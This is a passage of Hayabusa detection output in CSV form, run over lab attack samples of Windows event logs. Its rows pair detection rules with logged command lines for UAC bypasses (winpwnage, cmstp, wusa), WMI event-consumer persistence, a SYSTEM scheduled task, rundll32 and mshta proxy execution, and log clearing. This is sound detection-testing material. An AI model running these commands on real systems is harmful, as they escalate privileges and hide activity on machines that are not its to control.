c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:20.531 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:46:20.828 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet : Path: 
C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx +2019-05-12 01:54:02.071 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:07.508 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab : Path: C:\Windows\System32\makecab.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:12.493 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 01:54:12.821 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet : Path: C:\Windows\System32\wusa.exe : User: 
IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx +2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,informational,Logon Type 9 - NewCredentials,User: IEUser : Workstation: : IP Address: ::1 : Port: 0 : LogonID: 0x1bbdce : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx +2019-05-12 02:28:17.176 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:19.567 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini : 
Path: C:\Windows\System32\cmstp.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,Bypass UAC via CMSTP,,rules/sigma/process_creation/win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7},rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,CMSTP Execution Registry Event,,rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx +2019-05-12 02:57:49.903 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:22.809 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe : 
Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.215 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.450 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:23.590 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p 
c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:50.090 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -Embedding,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:54.887 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer WHERE Name=""BotConsumer23"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:55.028 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter WHERE Name=""BotFilter82"" DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p 
c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 02:58:55.153 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding WHERE Filter='__EventFilter.Name=""BotFilter82""' DELETE : Path: C:\Windows\System32\wbem\WMIC.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx +2019-05-12 03:10:42.434 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 1 -p c:\Windows\System32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 03:10:42.668 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\lsass.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 03:10:42.668 +09:00,IEWIN7,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_privesc_from_admin_to_system_handle_inheritance.evtx +2019-05-12 09:32:24.461 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe : Path: 
C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /create /xml c:\users\ieuser\appdata\local\temp\elevator.xml /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,low,Scheduled Task Creation,,rules/sigma/process_creation/win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:30.211 +09:00,IEWIN7,1,high,Suspicius Add Task From User AppData Temp,,rules/sigma/process_creation/win_pc_susp_schtasks_user_temp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:35.258 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /run /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:35.352 +09:00,IEWIN7,1,informational,Process Creation,Command: c:\Windows\System32\cmd.exe : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: taskeng.exe {9C7BC894-6658-423B-9B58-61636DBB1451} S-1-5-18:NT 
AUTHORITY\System:Service:,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 09:32:40.342 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\schtasks.exe"" /delete /tn elevator : Path: C:\Windows\System32\schtasks.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u elevate -i 4 -p c:\Windows\System32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_11_exec_as_system_via_schedtask.evtx +2019-05-12 22:30:32.931 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.400 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 9 -p c:\Windows\system32\cmd.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.400 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:30:46.556 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser 
: Parent Command: ""C:\Windows\System32\rundll32.exe"" ieframe.dll,OpenURL c:\users\ieuser\appdata\local\temp\ieframe.url",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:32:58.167 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,OpenURL file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:32:58.167 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:37.078 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:37.078 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:59.743 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file://C:/Windows/system32/calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:33:59.743 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.523 +09:00,IEWIN7,1,informational,Process Creation,"Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.523 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" : Path: C:\Windows\System32\mshta.exe : User: IEWIN7\IEUser : Parent Command: rundll32.exe url.dll,FileProtocolHandler file:///C:/programdata/calc.hta",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Windows Shell Spawning Suspicious 
Program,,rules/sigma/process_creation/win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:00.712 +09:00,IEWIN7,1,high,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:38:01.383 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\mshta.exe"" ""C:\programdata\calc.hta"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_openurl_FileProtocolHandler.evtx +2019-05-12 22:55:56.626 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:12.652 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" shdocvw.dll,OpenURL c:\users\ieuser\appdata\local\temp\shdocvw.url : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 12 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:56:12.652 +09:00,IEWIN7,1,medium,Suspicious Rundll32 
Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_shdocvw_openurl.evtx +2019-05-12 22:58:39.850 +09:00,IEWIN7,1,informational,Process Creation,"Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe : Path: C:\Python27\python.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 22:58:54.897 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 22:58:54.897 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_11_lolbin_rundll32_zipfldr_RouteTheCall.evtx +2019-05-12 23:18:03.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 23:18:09.589 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\rundll32.exe"" advpack.dll,RegisterOCX c:\Windows\System32\calc.exe : Path: C:\Windows\System32\rundll32.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" 
",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-12 23:18:09.589 +09:00,IEWIN7,1,medium,Suspicious Rundll32 Activity,,rules/sigma/process_creation/win_susp_rundll32_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_rundll32_advpack_RegisterOCX.evtx +2019-05-13 02:01:43.391 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:50.781 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe : Path: C:\Windows\System32\pcalua.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:51.007 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\pcalua.exe"" -a c:\Windows\system32\calc.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:01:51.007 +09:00,IEWIN7,1,low,Indirect Command Execution,,rules/sigma/process_creation/win_indirect_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_lolbin_pcalua.evtx +2019-05-13 02:09:02.275 